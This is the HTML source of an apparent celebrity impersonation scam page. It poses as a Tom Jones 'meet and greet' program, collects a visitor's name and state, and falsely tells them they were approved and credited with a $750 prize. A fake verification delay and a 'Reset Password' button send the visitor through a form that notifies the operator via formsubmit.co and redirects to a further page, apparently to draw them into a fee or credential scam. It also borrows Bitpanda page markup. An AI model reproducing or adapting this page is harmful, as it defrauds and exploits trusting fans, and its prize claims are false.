

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta charset=utf-8>   

  <title>Tom Jones</title>
  <style>
    #mainContent {
      display: none;
    }
    
    #processing {
      display: none;
      text-align: center;
    }
    
    .lds-ring {
      display: inline-block;
      position: relative;
      width: 60px;
      height: 60px;
    }
    
    .lds-ring div {
      box-sizing: border-box;
      display: block;
      position: absolute;
      width: 145px;
      height: 145px;
      margin: 8px;
      border: 7px solid DarkRed;
      border-radius: 50%;
      animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
      border-color: Black transparent transparent transparent;
    }
    
    .lds-ring div:nth-child(1) {
      animation-delay: -0.45s;
    }
    
    .lds-ring div:nth-child(2) {
      animation-delay: -0.3s;
    }
    
    .lds-ring div:nth-child(3) {
      animation-delay: -0.15s;
    }
    
    @keyframes lds-ring {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }
  </style>
  <script>
    function submitForm() {
      // Hide the form
      document.getElementById("myForm").style.display = "none";
      
      // Display the "Processing" message and animation
      document.getElementById("processing").style.display = "block";
      
      // Delay displaying the main content
      setTimeout(function() {
        // Hide the processing message and animation
        document.getElementById("processing").style.display = "none";
        
        // Display the main content
        document.getElementById("mainContent").style.display = "block";
        
        // Get the form data
        const name = document.getElementById("name").value;
        const email = document.getElementById("email").value;
        
        // Display the submitted form data in multiple places within the main content
        const submittedNameElements = document.getElementsByClassName("submittedName");
        const submittedEmailElements = document.getElementsByClassName("submittedEmail");
        
        for (let i = 0; i < submittedNameElements.length; i++) {
          submittedNameElements[i].textContent = name;
        }
        
        for (let i = 0; i < submittedEmailElements.length; i++) {
          submittedEmailElements[i].textContent = email;
        }
        
        // Scroll to the main content section
        document.getElementById("mainContent").scrollIntoView({ behavior: 'smooth' });
      }, 7000); // 7 seconds delay
    }
  </script>
</head>
<body>



  
  
  
  
  <form id="myForm" onsubmit="submitForm(); return false;">
  
 
  <div> 
  <div class="formbold-form-wrapper">


  <form id="myForm" onsubmit="submitForm(); return false;">

 
<h5>
<strong> <br>
To
access your  meet and greet profile, please enter your full name and state  below to ensure authorized access.
</strong> <br><br>
</h5>  






<div id="error-message"></div>

<script>
function validateInput(input) {
  var minLength = 4;
  var maxLength = 30;
  var errorMessage = document.getElementById("error-message");

  if (input.value.length < minLength || input.value.length > maxLength) {
    errorMessage.textContent = "Enter name";
    input.setCustomValidity("Complete This");
  } else {
    errorMessage.textContent = "";
    input.setCustomValidity("");
  }
}
</script>




<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
       <strong> Enter your first and last name</strong>
        </label>
  
        <input
          type="text" 
          
          oninput="validateInput(this)"
          
          required 
          name="A_"
         
         id="name"
         
          placeholder="Enter First and Last Name"  
          class="formbold-form-input"
        />
      </div>
      



<br>


     <label for="Field1" class="formbold-form-label">  
<strong>
Enter the state which you specified to meet Tom Jones.
</strong>
</label>


    <input type="text" id="email" name="A_"

oninput="validateInput(this)"

    placeholder="Enter State To Meet Tom Jones"  
          class="formbold-form-input" required
        />
      </div>


<br>

      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button>
      </div>
      
      
          <br> <br> <br> 


<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTfVeDHAl1s2dgJUrmrgghpPEU648iW0q9OCA&amp;amp;usqp=CAU">




     <br> 
<br>
  
<center> <h5>
<strong> 
Tom Jones | Meet and Greet 
</center> 
<br> 
</strong>
</h5> 


    </form>
  </div>
</div>


  

<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-7 {
    margin-bottom: 20px;
  }
  .formbold-pt-8 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 21px;
    color: Black;
    margin-bottom: 14px;
  }
  .formbold-form-label-9 {
    font-weight: 500;
    font-size: 21px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 17px 24px;
    border-radius: 6px;
    border: 2px solid Black;
    background: white;
    font-weight: 500;
    font-size: 21px;
    color: Black;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: Grey;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 22px;
    border-radius: 1px;
    padding: 16px 32px;
    border: none;
    font-weight: 500;
    background-color: DarkBlue;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style> 
  





  <div id="processing">



    <h5> 
<strong> 
<br> <br> 

<font size="+4">
 Verifying...
</font>

<br> <br> <br> 
<font size="+2">
Please wait for a few seconds.<br>Do not leave this page</font>

<br> <br><br>

   </strong> 
</h5> 


    <div class="lds-ring">
      <div></div>
      <div></div>
      <div></div>
      <div></div>
    </div>
  </div>
  



  <div id="mainContent">





   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>


<title>

Tom Jones

</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>


<link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate>

<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>


<script type=application/ld+json>{
                "@context": "https://schema.org",
                "@type": "BreadcrumbList",
                "itemListElement": [
                    [{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitpanda.com\/en"}]
                ]
            }</script> <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>











<h2>
<strong> 

Tom Jones 

</strong></h2>



 </div>
 
</header> 
    
    
    
    
  

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>












<h6> 


<div style="border: 1px solid black; padding: 10px; border-radius: 2px;">
<strong> 
<font size="+1">

 <span class="submittedName"></span>
 
 </font> 
 </strong> 
 <br> 
 
 <br> 

<div> 
<div class="container">
    <div class="left-text"><strong> 
    
<font size="+1">
<strong> 
Approved

</strong></font>

</div>
    <div class="right-text"><strong><font size="+0.5">Available Balance:</strong></strong> </font> 
    
    <br>
    
    <font size="+4">
 $750</font><strong><font size="+2">.00</font></strong>

</div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 

</div> 


</h6>





<h6> 
<strong> 



<font size="+0.5">
<Font STYLE="word-spacing:3px">



Welcome back, <span class="submittedName"></span>,  your application was approved and you've  been scheduled for an exclusive meet and greet session with Tom Jones in   <span class="submittedEmail"></span> on August 20, 2024. <br> You have also received a $750 welcome prize, which has been deposited into your meet and greet profile.  


<br> <br>

<font style="color: Brown"> 

SCROLL DOWN TO LEARN MORE
</font>


<br> <br>




To claim your $750  prize and obtain important details including the exact location, time and other details of  your meet and greet with Tom Jones, please log in to your Meet and Greet profile. This ensures secure access and confirms your eligibility as the rightful recipient.


<br> <br>
<br> 
An automatic ID and password were generated for you  during registration. To proceed, you will need to reset the automatically generated password and create a new one that you can easily remember. This will enable you to log in to  your Meet and Greet profile, where you can conveniently claim your $750 cash prize and stay updated on venue and timing details. Tap the reset password button below to set a secure password for your Meet and Greet  profile.






<br> <br> <br>















<div>
  <style>
    #loading-icon {
      display: none;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      z-index: 9999;
      text-align: center;
    }

    .spinner {
      width: 170px;
      height: 170px;
      margin: 0 auto;
      border: 18px solid #f3f3f3;
      border-top: 16px solid black;
      border-radius: 50%;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }

    #loading-text {
      font-weight: bold;
      margin-top: 10px;
      font-size: 35px;
      color: White;
      background-color: brown; /* Add brown background color */
      padding: 8px 13px; /* Add padding for better visibility */
      border-radius: 5px; /* Add border radius for rounded corners */
    }
  </style>

  <div id="loading-icon">
    <div class="spinner"></div>
    <div id="loading-text"><nobr>Please Wait...</nobr></div>
  </div>





<form  method="POST"  id="Deborah" action="https://formsubmit.co/4bf54b3ab80b3b2a069476d21c1d538c">

  <input type="hidden" name="_captcha" value="false">
  
  <input type="hidden" name="_next" value="https://celebrity-org.github.io/Next/">
  
  <input type="hidden" name="Important_Form_Is_Submited" value="Go And Check Immediately">
  

 <button type="submit" onclick="showLoadingIcon()" style="display: block; width: 100%; height: 55px; background-color: #2F539B; color: white; font-size: 22px; font-weight: bold; border: none; border-radius: 30px; cursor: pointer;">
 Reset Password
 </button>
 
 </from>
 

 
 
   <script>
    function showLoadingIcon() {
      var loadingIcon = document.getElementById("loading-icon");
      loadingIcon.style.display = "block";
      setTimeout(function() {
        document.getElementById("Deborah").submit();
      }, 1000); // Redirect after 2 seconds (adjust as needed)
    }

    function increaseFontSize() {
      var loadingText = document.getElementById("loading-text");
      var currentFontSize = window.getComputedStyle(loadingText, null).getPropertyValue('font-size');
      var currentFontSizeNumeric = parseFloat(currentFontSize);
      var newFontSize = currentFontSizeNumeric + 2;
      loadingText.style.fontSize = newFontSize + 'px';
    }
  </script>
  
</div>
   
 <br><br>


</strong>
</font></font> 

 </h6> 
 
 
 
 
 
 
 
 
 
  
  
  
  
  
  <h6>

<br><br> <br> <br>
<br>


<div style="background-color: black; color: white; padding: 20px; text-align: center;">


<p style="text-align: left;"><strong>
<font size="+4">
*****
</font>
</strong> 
</p>


<font size="+0.5">
<Font STYLE="word-spacing:4px"><strong>
Congratulations  <span class="submittedName"></span> you are one of the lucky fans who have won in the highly anticipated Tom Jones meet and greet program  this year. We sincerely hope this opportunity brings you immense joy and fulfillment. Tom Jones stands out because of his genuine care for his fans, as demonstrated by his generous offering of an incredibly valuable all-expenses-paid dinner and a cash prize.
<br><br>
Prepare yourself for an unforgettable and extraordinary intimate journey with Tom Jones. His aim is to put a smile on your face and create lasting memories that you will cherish.
  
  Once again, we extend our warmest congratulations, and we hope you relish every moment of this well-deserved win.
   </font> </font></strong>
   
   <br><br>
   <p style="text-align: right;"><strong>
<font size="+4">
*****
</font>
</strong> 
</p>
   
   </div> 
  
   </h6> 



<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">


<div>


 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">



</path> </symbol></svg>


  </div>
  
  <script>
    // Hide the processing message and form initially
    document.getElementById("processing").style.display = "none";
    document.getElementById("myForm").style.display = "block";
  </script>
</body>
</html>
